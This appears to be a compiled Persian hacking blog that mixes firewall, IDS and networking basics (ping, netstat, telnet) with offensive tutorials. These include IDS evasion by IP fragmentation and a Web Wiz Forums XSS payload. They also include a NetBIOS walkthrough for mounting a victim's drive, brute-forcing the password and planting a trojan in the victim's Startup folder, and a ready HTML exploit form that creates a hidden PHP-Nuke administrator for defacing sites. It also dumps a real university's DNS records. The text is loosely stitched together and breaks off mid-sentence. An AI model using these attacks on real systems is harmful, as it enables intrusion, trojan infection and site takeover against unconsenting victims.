امروزه حملات هكرها تكنيكي و هوشمند شده است به نحوي كه با ديوارهاي آتش و فيلترهاي معمولي كه مشخصاتشان براي همه روشن است نميتوان با آنها مقابله كرد . بنابراين بايد با استفاده از ديوارهاي آتش و فيلترهاي هوشمند با آنها مواجه شد .
از آنجا كه ديوارهاي آتش با استفاده از حذف بسته ها و بستن پورتهاي حساس از شبكه محافظت ميكنند , و چون ديوارهاي آتش بخشي از ترافيك بسته ها را به داخل شبكه هدايت ميكنند ,(چرا كه درغير اين صورت ارتباط ما با دنياي خارج از شبكه قطع ميشود . ) بنابراين هكرها ميتوانند با استفاده از بسته هاي مصنوعي مجاز و شناسايي پورتهاي باز به شبكه حمله كنند.
بر همين اساس هكرها ابتدا بسته هايي ظاهرا مجاز را بسمت شبكه ارسال ميكنند .
يك فيلتر معمولي اجازه عبور بسته را ميدهد و كامپيوتر هدف نيز چون انتظار دريافت اين بسته را نداشته به آن پاسخ لازم را ميدهد . بنابراين هكر نيز بدين وسيله از باز بودن پورت مورد نظر و فعال بودن كامپيوتر هدف اطمينان حاصل ميكند . براي جلوگيري از ان نوع نفوذها ديوارآتش بايد به آن بسته هايي اجازه عبور دهد كه با درخواست قبلي ارسال شده اند .
حال با داشتن ديوار آتشي كه بتواند ترافيك خروجي شبكه را براي چند ثانيه در حافظه خود حفظ كرده و آنرا موقع ورود و خروج بسته مورد پردازش قرار دهد ميتوانيم از دريافت بسته هاي بدون درخواست جلوگيري كنيم .
مشكل اين فيلترها زمان پردازش و حافظه بالايي است كه نياز دارند . اما در عوض ضريب اطمينان امنيت شبكه را افزايش ميدهند .
B ) ديوارهاي آتش مبتني بر پروكسي :
ديوارهاي آتش هوشمند فقط نقش ايست وبازرسي را ايفا ميكنند و با ايجاد ارتباط بين كامپيوترهاي داخل و خارج شبكه كاري از پيش نميبرد . اما ديوارهاي آتش مبتني بر پروكسي پس از ايجاد ارتباط فعاليت خود را آغاز ميكند . در اين هنگام ديوارهاي آتش مبتني بر پروكسي مانند يك واسطه عمل ميكند , به نحوي كه ارتباط بين طرفين بصورت غير مستقيم صورت ميگيرد . اين ديوارهاي آتش در لايه سوم ديوار اتش عمل ميكنند . بنابراين ميتوانند بر داده هاي ارسالي در لايه كاربرد نيز نظارت داشته باشند .
ديوارهاي آتش مبتني بر پروكسي باعث ايجاد دو ارتباط ميشود :
1- ارتباط بين مبدا و پروكسي
2- ارتباط بين پروكسي و مقصد
حال اگر هكر بخواهد ماشين هدف در داخل شبكه را مورد ارزيابي قرار دهد در حقيقت پروكسي را مورد ارزيابي قرار داده است و نميتواند از داخل شبكه اطلاعات مهمي بدست آورد .
ديوارهاي آتش مبتني بر پروكسي به حافظه بالا و CPU بسيار سريع نياز دارند . و از انجا كه ديوارهاي آتش مبتني بر پروكسي بايد تمام نشستها را مديريت كنند گلوگاه شبكه محسوب ميشوند . پس هرگونه اشكال در آنها باعث ايجاد اختلال در شبكه ميشود .
اما بهترين پيشنهاد براي شبكه هاي كامپيوتري استفاده همزمان از هر دو نوع ديوار آتش است . با استفاده از پروكسي به تنهايي بارترافيكي زيادي بر پروكسي وارد ميشود . با استفاده از ديوارهاي هوشمند نيزهمانگونه كه قبلا تشريح شد به تنهايي باعث ايجاد ديواري نامطمئن خواهد شد . اما با استفاده از هر دو نوع ديوار أتش بصورت همزمان هم بار ترافيكي پروكسي با حذف بسته هاي مشكوك توسط ديوار آتش هوشمند كاهش پيدا ميكند و هم با ايجاد ارتباط واسط توسط پروكسي از خطرات احتمالي پس از ايجاد ارتباط جلوگيري ميشود .
البته اين نوع ديوار آتش براي سيستمهايي كه اطلاعات محرمانه دارند كاربرد دارد و براي كاربردهاي معمولي كمتر استفاده ميشود .
C ) ديوارهاي آتش شخصي :
ديوارهاي آتشي كه معرفي شد ديوارهاي آتشي هستند كه توسط مدير شبكه و براي كل شبكه استفاده ميشوند . حال اگر شبكه اي اين امكانات را براي كاربران خود فراهم نكند , شخصي كه ميخواهد مانع از دزديده شدن اطلاعاتش شود يا از مزاحمتهاي ديگران ممانعت بعمل آورد چه بايد بكند ؟
TCP/IP امكان حفاظت از اطلاعات را فراهم نكرده است اما با استفاده از ديوار آتش شخصي كه در سطح كاربرد TCP/IP استفاده ميشود ميتوانيد از كامپيوترتان در مقابل نفوذ هكرها دفاع كنيد .
اگر از ويندوز XP استفاده ميكنيد , خود ويندوز امكانات ديوار آتش رايگاني براي شما فراهم كرده است , اما در غير اينصورت ميتوانيد با استفاده از برنامه هايي كه به همين منظور تهيه شده اند از سيستمتان دفاع كنيد .
معروفترين و بهترين برنامه ها در اين راستا برنامه هاي زير ميباشند :
Norton Firewall
يه سيستم امنيتی که با توجه به ترافيک شبکه ، مسئول شبکه رو از فعاليت هکرها مطلع می کنه .
IDS در دو لايه شبکه و کاربرد عمل می کنه .
IDS در سطح شبکه :
در اين لايه سيستم يک بانک اطلاعاتی از انواع حملات ، بسته های IP رو مورد پردازش قرار داده و در صورت وقوع حمله ، مسئول شبکه رو مطلع می کنه و خودش به تعقيب حمله ادامه می ده .
IDS در سطح کاربرد :
در اين لايه IDS تمام تقاضاهای ارسالی رو مورد پردازش قرار می ده و در صورت دريافت تقاضای نامربوط به مسئول شبکه اخطار می ده . با توجه به عملکرد IDS در سطح کاربرد ، برای هر برنامه کاربردی ، به يک IDS مربوط به هموون برنامه نياز داريم .
اما هکرها در مقابل اين سيستمها چکار می کنند ؟
برای عبور از IDS سطح شبکه ، بايد ترافيک بسته ها رو بگونه ای تنظيم کرد که سيستم نتوونه بسته های خطرناک رو تشخيص بده . برای اين منظور بايد از روشهايی استفاده کرد که بانک اطلاعاتی IDS نتوونه اوون حمله رو تشخيص بده . بهترين راه برای اينکار برنامه نوپسی است .
اما روشهای ديگه هم برا ی اينکار وجود دارند .
IDS برای کشف خطر ، اغلب از سرآيند بسته TCP استفاده می کنه و با مجاز تشخيص دادن بسته اول به بقيه بسته ها اجازه عبور می ده . حالا فرض کنيد يه بسته برای برقراری ارتباط با پورت 23 ارسال کنيم . با توجه به مطلب فوق می توونيم با شکستن بسته IP طوری که شماره پورت مبدا در يک بسته و شماره پورت مقصد در يک بسته ديگه قرار بگيره می توونيم از IDS عبور کنيم . چرا که IDS به خاطر نداشتن شماره پورت مقصد ، به خيال متعارف بودن بسته ، به اوون اجازه عبور می ده .
روش ديگه برای اينکار استفاده از فيلد Fragment Offset از بسته IP است . برای اينکار بسته اول با مشخصات متعارف به سمت هدف ارسال می شه . IDS با مجاز تشخيص دادن اوون به بقيه بسته ها هم اجازه عبور می ده . حالا بسته دوم رو که بر اساس مقاصد هکره با تنظيم Fragment Offset طوری که اطلاعات اوون روی بسته اول نوشته بشه بسمت هدف فرستاده می شه .
برای تکه تکه کردن سته ها می توان از نرم افزار هايی که برای اينکار نوشته شدن استفاده کرد . يکی از اين نرم افزارها ، FragRouter هست .اماهکرها چطور از دست IDS در سطح کاربرد فرار می کنند ؟
اکثر برنامه های تحت وب بر اساس اسکريپتهای CGI يا ASP نوشته می شوند . اساس کار اين اسکريپتها در ذخيره و بازيابی اطلاعات و يا عملياتهای Online هست .
هکرها سعی می کنند تا با پيدا کردن نقاط ضعف اين اسکريپتها از اوونا برای حمله به هدف استفاده کنند .
IDS برای تشخيص حمله در سطح کاربرد ، درخواستهای GET ، POST ، PUT و DELETE رو بررسی می کنه و در صورت دريافت درخواستی که يک اسکريپت رو اجرا کنه ، اعلام خطر می کنه .
يکی از نرم افزارهايی که برای اينکار مورد استفاده قرار می گيره ، Whisker هست که می توونيد از ????? دانلودش کنيد .
اين نرم افزار يه بانک اطلاعاتی شامل نقاط ضعف بيش از 500 نوع اسکريپت مختف CGI و ASP داره .
Whisker برای فرار از IDS در سطح کاربرد ، از روشهای مختلفی استفاده می کنه .
بهترين پِشنهاد برای مقابله ، استفاده همزمان از هر دو نوع IDS هست . چرا که هکر برای منظور خود از هر راهی استفاده خواهد کرد . بنابراين از نرم افزارهايی مثل FragRouter و Whisker بصورت تواما استفاده می کند .
IDS در سطح شبکه بر ترافيک بسته ها و IDS در سطح کاربرد بردرخواستها نظارت می کند .
يکی ديگه از ابزارهای شناسايی هست که هم می توونه برای هکرها و هم مسئولين شبکه مفيد باشه .
plag-in های زيادی برای اين نرم افزار وجود داره که با استفاده از اوونا می توان از اين نرم افزار بهترين استفاده رو ببريم .
اين نرم افزار در دو قسمت Client و Server طراحی شده که قسمت Client اوون می توونه روی هر ماشينی اجرا بشه . کار اين قسمت ارسال دستورات کاربر به Server Nessus . بنابراين برای ماشينهايی که پهنای باند محدودی دارند مفيده . اما بخش سرور دستورات کاربر رو اجرا می کنه . ساده ترين راه برای استفاده از امکانات اين نرم افزار نصب هر دو قسمت روی يک کامپيوتره .
هر دو قسمت اين نرم افزار در محيطهای Unix و به خصوص Linux به خوبی کار می کنه . اما Windows فقط قسمت Client اوون رو پشتيبانی می کنه .
اين نرم افزار Open Source هست و اين قابليت رو داره تا با نوشتن Plag-in ها بوسيله برنامه نويس توسعه داده بشه .
شما می توونيد Plag-in هايی رو با C بنويسيد و با استفاده از NAPI (Nessus Application Interface) اوون رو به بقيه Plag-in ها متصل کنيد .
Nessus همچنين نرم افزار Nmap رو در خودش جا داده . و می توونه با استفاده از Plag-in های موجود ، کار Firewalk رو هم انجام بده .
اما Nessus يه بانک با بيش از 500 نوع Plag-in داره که مهمترين دسته های اين Plag-in ها عبارتند از :
Windows :
برای حملات به سيستمهای مبتنی بر ويندوز .
Backdoor :
برای کشف ويروسهای اسب تراوا بر روی ماشين هدف .
Denial of service :
برای يافتن حفره هايی که قادرند کل شبکه رو مختل کنند .
Miscellaneouse :
برای تشخيص نوع سيستم عامل .
General :
برای کشف نوع و ويرايش سرور وب ، FTP و Mail بکار می ره .
Firewall :
برای کشف نقاط ضعف ديوار آتش .

در ضمن منبع این درس کتاب آموزش هک و ضد هک نوشته ی دکتر ابولفضل طاهریان ریزی صفحات ۴۰ تا ۲۰۰ به طور خلاصه است اینو گفتم که نگین از جایی کپی کردی .

وبلاگ جدید من

از این به بعد تواین وبلاگ    می نویسم

HTTP://WWW.HACKERIRANI.BLOGFA.COM

سری به اینجا بزنید

آموزش ها جدید تواین وبلاگ

 اين پرتال پر استفاده ترين پرتال asp در ايرانه که با نامهاي مختلف (بدون لايسنس) استفاده ميشه
اينم ايز چند تا باگ درست و را دست براي آخرين ورپن ها ي

Web Wiz Forums Web Wiz Forums 7.5
Web Wiz Forums Web Wiz Forums 7.7 b
Web Wiz Forums Web Wiz Forums 7.7 a
Web Wiz Forums Web Wiz Forums 7.8
Web Wiz Forums Web Wiz Forums 7.51

اما در اين ورپن کار نميکنه :
not vulnerable Web Wiz Forums Web Wiz Forums 7.9

اون :

كد:
registration_rules.asp?FID=%22%3E%3Cscript%3Ealert%28%27Vulnerable%2520%21%2
7%29%3C%2Fscript%3E

طريقه پچ كردن حرفه اي اون :

راه دستي :
ميگرديد و فايل registration_rules.asp را از شاخه اي كه فروم web wiz قرار دارد پيدا ميكنيد .
بعد به دنبال خط زير ميگرديد :

كد:
intForumID = Request.QueryString("FID")


و به اين خط تغييرش ميدهيد :

كد:
If isNumeric(Request.QueryString("FID")) Then
intForumID = CInt(Request.QueryString("FID"))
Else
intForumID = 0
End If [/code]

ip

شماره‌ ايست که به هر کامپيوتر متصل به اينترنت داده می‌شود تا بتوان به‌کمک آن شماره به آن کامپيوترها دسترسی داشت. اين عدد برای کامپيوترهايی که حالت سرور دارند (مثلا سايت‌ها) و نيز کامپيوتر‌های کلاينتی که معمولا به روشی غير از شماره‌گيری (Dial Up) به اينترنت وصل هستند، عددی ثابت و برای ديگران عددی متغير است. مثلا هر بار که شما با شرکت ISP خود تماس گرفته و به اينترنت وصل می‌شويد، عددی جديد به شما نسبت داده می‌شود.
اين عدد يک عدد ۳۲ بيتی (۴ بايتی) است و برای راحتی به‌صورت زير نوشته می‌شود:
xxx.xxx.xxx.xxx که منظور از xxx عددی بين ۰ تا ۲۵۵ است (البته بعضی شماره‌ها قابل استفاده نيست که بعدا علت را توضيح خواهم داد). مثلا ممکن است آدرس شما به صورت 195.219.176.69 باشد. حتی اسم‌هايی مثل www.yahoo.com که برای اتصال استفاده می‌کنيد، در نهايت بايد به يک IP تبديل شود، تا شما سايت ياهو را ببينيد.
در IP معمولا xxx اولی معنای خاصی دارد، که بعدا توضيح می‌دهم... فقط اين را بگويم که اگر به روش Dial Up به اينترنت وصل شويد، معمولا عددی که به عنوان xxx اول می‌گيريد، مابين 192 تا 223 خواهد بود.اين توضيح برای تشخيص کامپيوترهای کلاينت از سرور (حداقل در ايران) بسيار می‌تواند مفيد باشد.
بعد از اتصال به اينترنت برای به دست آوردن IP خود، از دستور IPCONFIG در command prompt استفاده کنيد.

------------------------------------------------------------

بدست اوردن ip ديگران بدون نياز به برنامه:

اگر در چت روم با شخصی در حال چت  کردن هستيد از او بخواهيد يک فايل(عکس)  برای شما بفرستد در هنگام دانلود فايل به منوی start رفته و بر روی گزينه run کليک کنيد ودر  کادر باز شده ( در ويندوزXP هستيد cmd تايپ کنيد ،در ويندوز 98  commandتايپ کنيد ) يک صفحه داس مانند برای شما باز می شود که مانند دستور  روبرو  عمل کنيدc:\>netstat  -n
تايپ کنيد می بينيد در دو رديف به شما تعدادی شماره نشان خواهد داد که در  رديف اول ip خود شماست ودر رديف دوم ip طرف مقابل است . البته اين هم گفته باشم که بعضی از  آن شماره ها ip سايتها يست که باز کرديت . در بخش آموزش نرم افزارها روش های ساده تری را آموزش می دهم.

------------------------------------------------------------
بدست اوردن ip سايت:

برای بد ست اوردن ip سايت می توانيم در همان command prampt از دستور ping استفاده کنيم  مانند مثال اگر بخواهيم ip سايت yahoo را  پيدا کنيم مانند دستور زير عمل می کنيم

   C:\>ping  yahoo.com می بينيد که براحتی ip سايت yahoo به شما نشان خواهد داد

******************************************************************

- Port

در ساده ترين تعريف، محلی است که داده‌ها وارد با خارج می‌شوند. در مبحث هک معمولا با پورت‌های نرم‌افزاری سروکار داريم که به هر کدام عددی نسبت می‌دهيم. اين اعداد بين ۱ و ۶۵۵۳۵ هستند. معمولا به يک سری از پورت‌ها کار خاصی را نسبت می‌دهند و بقيه به‌صورت پيش‌فرض برای استفاده شما هستند. پورت‌های که فعال هستند، هرکدام توسط يک نرم‌افزار خاص مديريت می‌شوند. مثلا پورت ۲۵ برای ارسال Email است، بنابراين بايد توسط يک نرم‌افزار اين کار انجام شود و اين نرم‌افزار بر روی پورت ۲۵ منتظر (فال‌گوش) می‌ماند. اينجا ممکن است شخصی از فلان نرم‌افزار و ديگری از بهمان نرم‌افزار استفاده کند ولی به‌هر حال پورت ۲۵ هميشه برای ارسال Email است.

------------------------------------------------------------

روش بدست اوردن پورتهای باز :

شما ميتوانيد با استفاده از ipeye و داشتن ip طرف مقابل پورتهای باز ان را پيدا کنيم ابتدا وارد cmd شده و مسير ipeye را فعال کنيد  يعنی اينکه اگر ipeye درون درايوی :C وجود دارد ابتدا وارد درايو :C شده ودستور زير را تايپ کنيد. مثال ميخواهيم پورتهای باز اين  ip10.0.0.50 را بدست بيا وريم C:\>ipeye  10.0.0.50 -syn -p  1  2000  اين دستور از پرت ۱  تا ۲۰۰۰ را scan می  کند وبه شما نشان می دهد که کدام پورت باز و کدام بسته است

- ping چيست ؟

ping دستوری است که مشخص می‌کند که آيا يک کامپيوتر خاص که ما ip يا domain آن را می‌دانيم، روشن و فعال (Active) هست يا نه. و اينکه اگر فعال باشد مدت زمان رسيدن بسته‌های tcp/ip از آن کامپيوتر به کامپيوتر ما چقدر است.
کاربرد اين دستور به صورت زير است:

ping ip-or-domain

که به جای ip-or-domain بايد شماره ip و يا domain آن(اگر داشته باشد) را می‌گذاريم.

مثلا ping sazin.com را در command prompt تايپ کردم و به نتايج زير رسيدم :

Pinging sazin.com [63.148.227.65] with 32 bytes of data:
 
Reply from 63.148.227.65: bytes=32 time=1402ms TTL=105
Reply from 63.148.227.65: bytes=32 time=941ms TTL=105
Reply from 63.148.227.65: bytes=32 time=981ms TTL=105
Reply from 63.148.227.65: bytes=32 time=851ms TTL=105
 
Ping statistics for 63.148.227.65:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 851ms, Maximum =  1402ms, Average =  1043ms

اين نتايج نشان می‌دهد که sazin.com فعال است.

حالا به کامپيوتری با ip شماره 63.148.227.65 (که همان sazin.com است)، ping می‌کنم. نتايج همان است فقط با تغييراتی در سطر اول. (البته time که معنای مدت زمان رسيدن پکت را می‌دهد، با توجه به ترافيک شبکه، کم و زياد خواهد شد). برای ping کردن به اين ip ، دستور 63.148.227.65 ping را صادر می‌کنم :

Pinging 63.148.227.65 with 32 bytes of data:
 
Reply from 63.148.227.65: bytes=32 time=861ms TTL=105
Reply from 63.148.227.65: bytes=32 time=852ms TTL=105
Reply from 63.148.227.65: bytes=32 time=851ms TTL=105
Reply from 63.148.227.65: bytes=32 time=881ms TTL=105
 
Ping statistics for 63.148.227.65:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 851ms, Maximum =  881ms, Average =  861ms

فرض کنيد که به يک ip که فعال نيست، ping کنيم:

Pinging 217.66.196.1 with 32 bytes of data:
 
Request timed out.
Request timed out.
Request timed out.
Request timed out.
 
Ping statistics for 217.66.196.1:
    Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum =  0ms, Average =  0ms

که نشان می‌دهد که آن ip در آن لحظه فعال نيست.

البته تمام مطالبی که در بالا ذکر شد، در حالتی است که مستقيما به اينترنت وصل شده‌ايد و يا اگر از طريق شبکه محلی به اينترنت وصل هستيد، شبکه شما به درستی پيکربندی شده باشد. اصولا ping يکی از بهترين دستورات برای پيدا کردن ايراد در شبکه است.

- چگونه به يک پورت Telnet کنيم؟

برای اينکه عملکرد يک پورت برای شما روشن شود، بايد به آن پورت Telnet کنيد. (البته معمولا تعدادی از پورت‌هايی را که ممکن است اطلاعاتی مهم را در اختيار هکر‌ها قرار دهند مثل پورت ۷۹ معمولا بسته است و ارتباط با آنها شايد برقرار نشود.) برای telnet کردن در command prompt دستور زير را تايپ کنيد:

  telnet hostname   portnum 

  telnet iums.ac.ir 13 
  telnet iums.ac.ir daytime 

 iums.ac.ir.                    SOA    sina.i........0 345600)
 iums.ac.ir.                    NS     sina.iums.ac.ir
 iums.ac.ir.                    NS     ns1.nic.ir
 iums.ac.ir.                    MX     10   sina.iums.ac.ir
 smtp.iums.ac.ir.               A      195.146.34.181
 sina.iums.ac.ir.       HINFO  Sun-SuperSPARC5/75  UNIX-Solaris-2.6
 sina.iums.ac.ir.               MX     10   sina.iums.ac.ir
 sina.iums.ac.ir.               A      194.225.184.20
 sina.iums.ac.ir.               A      195.146.34.181
 sun.iums.ac.ir.                CNAME  sina.iums.ac.ir
 cisco.iums.ac.ir.              CNAME  router.iums.ac.ir
 webmail.iums.ac.ir.            A      195.146.34.181
 linux.iums.ac.ir.              A      194.225.184.19
 linux.iums.ac.ir.      HINFO  Intel-Xeon/800  RedHat-Linux-7.2
 mta.iums.ac.ir.                A      195.146.34.181
 pop3.iums.ac.ir.               CNAME  sina.iums.ac.ir
 localhost.iums.ac.ir.          A      127.0.0.1
 proxy.iums.ac.ir.              CNAME  arvand.iums.ac.ir
 www.iums.ac.ir.                A      195.146.34.180
 atrak.iums.ac.ir.              A      194.225.184.14
 ns1.iums.ac.ir.                CNAME  sina.iums.ac.ir
 arvand.iums.ac.ir.             A      194.225.184.13
 router.iums.ac.ir.             A      194.225.184.1
 router.iums.ac.ir.     HINFO  Cisco3640/Access-Server  IOS-IP-12.0
 iums.ac.ir.                    SOA    sina.iu.......3456000 345600)

sina.iums.ac.ir.       HINFO  Sun-SuperSPARC5/75  UNIX-Solaris-2.6 

telnet www.hotmail.com 80
nc -v www.hotmail.com 80

HTTP/1.0 302 Moved Temporarily
Server: Microsoft-IIS/5.0
Date: Thu, 05 Dec 2002 12:02:51 GMT
Location: http://lc2.law5.hotmail.passport.com/cgi-bin/login
X-Cache: MISS from cache5.neda.net.ir
Connection: close

nc -v www.far30.com 80 < ali.txt
type ali.txt | nc -v www.far30.com 80

GET /startup/index.html HTTP/1.0

nc -v www.site.com 80 > index.html

nc -v www.site.com 80 < dastoorat.txt > index.html

خیلی ها دوست دارن سایت هک کنن ولی به علتهای مختلف یا نمیتونن وقت بزارن روش یا سایت امنیتش بالاست یا فرد دانش هک کردن رو نداره و... حالا در این درس به آموزش چندین روش برای آموزش هک متداول ترین فروم که PHP-Nuke است بپردازیم.
اول باید خصوصیات سایت را بررسی کنید و اولین خوصوصیات ضروری پی اچ پی نوک بودن آن هست! به روش های مختلف هک کردنه یوزر ادمین یا ساختن ادمین مخفی را یاد بگیرید.
در هر سایت نوک یک فروم قرار دارد و همینوطور که میدانید در فروم یک یا چند نفر به cp (مخفف کنترل پانل) دسترسی دارند. شاید از همین فکر چیزی فهمیده باشید. پس در هر تالار چندین کاربر (user) وجود دارد (بستگی به کیفیت تالار دارد) و مدیر هم در بین این کاربران هست و نا کاربری او فاحش هست و می توانید آن را به راحتی ببینید.با این توضیح شما دو روش را برای هم حدس زدید. درسته ! می گن هک سایت سخته ولی اونقدرا هم سخت نیست حتی با ماجیک هم میشه سایت هک کرد! پس فعلا با ماجیک هک می کنیم تا برسیم به جاهای پیشرفته! حالا بايد به سيستم طرف براي نصب تروجان نفوذ كنيد و نت بايوس بهترين راه هست!
نفوذ به سيستم از طريق NetBios
-------------------------------------------
با یاد گیری این مقاله شما میتونید یک درایو از سیستم قربانی رو به وسیله نت بایوس Share کنید و هر کاری که خواستید توی اون درایو انجام بدید ( فایل بذارید ، بردارید ، پاک کنید و ... ) البته من این مقاله رو به صورت تصویری هم تو سایت گذاشتم ، می تونید دانلود کنید.
خب بریم سره موضوع اصلی:
اول باید IP سیستم مورد نظر رو پیدا کنید ( تو سایت قبلا اموزش دادم ) ، بعد از منوی Start قسمت Run برید و تایپ کنید CMD. بعد از اینکه وارد CMD شدید این دستور رو بنویسید:
Net use x: \\IP\DriveName$
به جای X میتونید هر حرفی رو بنویسید به غیر از حروفی که اسم درایو های خودتون هست.مثلا اگه درایو G داشته باشید ، از حرف G نمیتونید استفاده کنید. به جای IP هم ای پی مورد نظر رو که می خواهید بهش نفوذ کنید رو بنویسید. به جای DriveName هم اسم درایو رو بنویسید. اگه مثلا میخواهید درایو C رو Share کنید ، حرف c رو بنویسید.یک نمونه از دستور رو ببینید:
Net use x: \\80.191.191.39\c$
اگه کمی شانس داشته باشید بدون در خواست User Name و Password درایو Share میشه و این پیغام رو مینویسه: The command completed successfully اما اگه از شما در خواست یوزر نیم و پسورد کرد به جای یوزر نیم کلمه Administrator رو وارد کنید که برای ویندوز XP و 2000 تعریف شده است ( البته معمولا تو یه خط یوزر نیم رو میده ).پسورد هم میتونید با یه برنامه مثل بروتوس( Brutus ) پیدا کنید.
اگه شما درایوی رو Share کرده باشید که ویندوز قربانی هم تو همون درایو نصب شده باشه ، می تونید سرور یک تروجان رو تو پوشه Startup تو قسمت Start Menu کپی کنید و منتظر باشد قربانی ریستارت کنه تا فایل سرور اجرا شه و شما به راحتی با تروجان به سیستم وارد بشید. ( یادتون باشه که سرور رو فقط کپی کنید چون اگه اجرا کنید در واقع تو سیستم خودتون اجرا کردید ) (نويسنده : فرشاد عزيز)
حالا که یک تروجان در ستارت آپ طرف کپی شد و پسورد او را دریافت کردید.....
هر کاربر در هنگام ثبت نام در هر تالاری در سایت های نوک باید به اجبار ایمیلی برای خود انتخاب کند که پسورد انتخاب شده به آن ایمیل ارسال شود. ایم خودش یک باگ امنیتی هست و لازم نیست که حتما اکسپلویتی جولوی شما باشد! (ولی بعد از این روش با اکسپلویتی برای هک نوک هک آشنا می شوید)خوب به قسمت (رمزعبور را فراموش کردم) یا ( Forget PassWord ) بروید و ایمیل طرف را وارد تا پسورد فرستاده شود. (این عمل در صورتی اتفاق می شود که نام کاربری بوسیله ی یک ایمیل پشتیبانی شود که در اغلب فروم ها اینجوری هست) حالا که پسورد کاربر مدیر و یا همان شناسه مدیر را گرفتید به منطقه ی کنترل (کنترل پانل) نفوذ کنید و شناسه ی حای را پاک کرده و شناسه ای بسازید و index را عوض کنید. قبل از اینکه ورود به کنترل پانل را به شما یاد دهیم بهتر استروش دیگری برای ساخت ادمین مخفی ( hide admin ) یاد بگیریم! اول باید بفهمیم که نوک چیست؟
پی اچ پی نوک انواع مختلفی دارد که از سال ۲۰۰۱ به ورژن های مجانی تبدیل شد و برای همین شهرت زیادی پیدا کرد در ابتدا تیم های آمریکایی و پاکستانی ورزن های ۶.۸ . ۶.۹ را مجانی کردند و ایرانی های عزیز نیز برای هموطننانشان از ورژن ۷.۳ تا ۷.۸ (آخرین نسخه) را ترجمه کردند و نوک های فراسی را بوجود آوردند. مثل گروه معروف IranNuke
این اکسپلویت هم به شما کمک می کند که در کنترل پانل سایت نوک وارد شوید و شناسه ی مدیرتی برای خود بسازید. این اکسپولیت برای نوک ۷.۳ تا ۷.۷ هست و نوک ۷.۸ را فقط اگر روی لکال هاست باشد هک می کند.

<form name="mantra" method="POST" action="http://www.sitename.com/admin.php"> USERNAME: <input type="text" name="add_aid"><br> NOME: <input type="text" name="add_name"><br> PASSWORD: <input type="text" name="add_pwd"><br> E-MAIL: <input type="text" name="add_email"><br> <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"><br> <input type="hidden" name="add_radminsuper" value="1"><br> <input type="hidden" name="op" value="AddAuthor"></p> <input type="submit" name="Submit" value="Create Admin"><br> </form>

خوب در قسمتی از کد نوشته شده: http://www.sitename.com/admin.php
به جای sitename نام سایت را بنویسید و آن را با پسوند html ذخیره سازید.
به این صورت : exploit.html
حالا روی آن کلیک کنید و صفحه ای همانند صفحه ی عضویت در آن تالار باز می شود! (حالا بستگی دارد که چه چیز هایی از شما درخواست کند) حالا آن را که پر کردید در زیر آن Create Admin را کلیک کنید و مستقیما به http://www.sitename.com/admin.php میرید و اونجا با یوزری (شناسه ایی) که ساختید وارد شوید! حالا شما هم سایت پی اچ پی نوک هک کردید!

موفق باشید

منبع:www.eblis-empire.tk.

درس ۲ هک 

تلنت کردن معمولا اولين کاری است که يک هکر برای هک کردن يک سايت انجام می‌دهد، زيرا بعضی از پورت‌ها در صورت بسته نبودن روی آن سرور، معمولا حاوی اطلاعات بسيار مهمی هستند.(به همین دلیل ما باید اول پورتها رو چک کنیم بعد telnet چون اگر پورتی که ما بهش telnet میکنیم close باشه دستور اجرا نمیشه)

موضوع مهمي كه يك نفوذ گر واقعي به آن توجه مي كند در سه اصل خلاصه شده است :

۱- او هيچگاه سعي در استفاده از برنامه هايي كه ديگران نوشته اند نمي كند ... »البته ممكن است تعدادي از جوجه هكر ها باشند كه با استفاده از تروجان ها يا Back doors ها به اين كار بيپردازند و فقط خود را با اين مباحث ساده درگیر کنند.

2- معمولا از به كارگيري برنامه هاي گرافيكي كه حتي خود طراحي كرده اند نفرت دارند و فقط در دنياي سياه و سفيد msdos-prompt براي خود حكومت تشكيل ميدهند.(در اصل از استفاده نرم افزار برای هک نفرت دارند)

3- موضوع سوم و اساسي اين است كه فقط يك چيز را در دنيا ميشناسند و آن هم تايپ كردن است.تایپ در صفحه سیاه و سفید command prompt .

دستور Netstat و استفاده از این دستور:

این دستور که با سویچ های دیگری هم استفاده میشه یکی از دستورایی هست که همه هکر ها اول باهاش آشنا میشن.که با تايپ اين دستور شما متوجه آي پي سيستمها و پورتهايي که با آنها در ارتباط هستيد میشوید و مشاهده ميکنيد که چه پورتهايي Listening و يا Established هستن اين باعث ميشود اگر پورتي مخصوص يک تروجن مثل 27374 که پورت اصلي Sub7 هست در سيستم شما باز بود شما متوجه اين پورت باز بروي سيستمتان بشويد. اگر در قسمت Foreign Address هم يک آي پي بوسيله پورتي به سيستم شما وصل بود شما به سرعت متوجه مي شويد که يک نفر با آن آيپي در سيستم شماست ، پس اين راهيست که متوجه گرديد سيستمتان آسيب پذير است يا نه ، براي مثال من با تايپ دستور Netstat در Ms-Dos پس از اتصال به اينتر نت نتايج زير را گرفتم :
C:\WINDOWS>netstat
Active Connections
Proto Local Address Foreign Address State
TCP Midia:1454 cs33.msg.sc5.yahoo.com:5050 ESTABLISHED
TCP Midia:1488 63.123.44.222:80 ESTABLISHED
TCP Midia:1491 opi1.vip.sc5.yahoo.com:80 TIME_WAIُT
TCP Midia:1497 64.187.54.23:80 ESTABLISHED
TCP Midia:1498 64.187.54.23:80 ESTABLISHED

همانطور که ملاحظه ميکنيد اين دستور گاهي اوقات اسم صاحب سيستم کلاينتي که شما با آن در ارتباط هستيد را نيز ميدهد و چون اينجا من با کسي در PM نبودم اسم کسي را نميبينيد ولي اگر کسي با من چت کند و دستور Netstat را اجرا كند اسم را ميبيند و متوجه ميشود کهMidia صاحب آن سيستم کلاينتي مي باشد که در حال چت كردن با آن است و همچنين در اين قسمت مشخص است که من با پورت 5050 با ياهو مسنجر ارتباط برقرار کرده ام و نيز نتايجي که در زير Local Address مشخص است اطلاعاتي درباره خود من مي باشد . و نتايجي که در Foreign Address بدست مياد مشخص ميکند که ما با چه سرور يا کلاينتي در ارتباط هستيم . که در سطر پنجم مثال بالا يعني 63.123.44.222:80 آيپي سايت ياهو ميباشد و مشخص ميكند كه من در سايت ياهو بوده و به وسيله پورت 80 که پورت Http ميباشد با اين وب سرور ارتباط برقرار کرده ام و در قسمت Status هم مشخص ميشود که شما با چه پورتهايي Established هستيد يعني ارتباط برقرار کرده و وصل هستيد و چه پورتهايي Listening يا منتظر Request و در حال شنيدن مي باشيد ، بنابراين با دستور Netstat مي 